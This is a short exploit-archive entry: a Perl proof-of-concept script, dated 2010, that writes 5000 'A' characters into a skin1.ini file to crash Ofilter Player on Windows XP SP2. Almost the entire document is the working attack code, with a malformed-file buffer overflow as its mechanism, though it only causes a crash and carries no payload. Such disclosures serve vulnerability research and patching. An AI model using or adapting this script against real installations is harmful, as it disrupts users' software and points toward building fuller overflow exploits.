Ofilter Player crash proof of concept exploit that creates a malicious .ini file.
703ad65b4f8426288ebddbaf3f51605f1e944c689c59eab2a902e9f221a186d1
#!/usr/bin/perl
#Exploit Title: Ofilter Player (skin.ini) Local Crash PoC
#Date:13/01/2010
#Author:Vulnerability Discovered By Rehan Ahmed (rehan@rewterz.com)
#Software Link:https://www.008soft.com/products/ofilter-player.htm
#Tested On: WinXP SP2
my $boom="\x41" x 5000;
my $file="skin1.ini"; #C:\Program Files\OfilterPlayer\skin
open($FILE,">$file");
print $FILE $boom;
close($FILE);
print "File Successfully Created\n";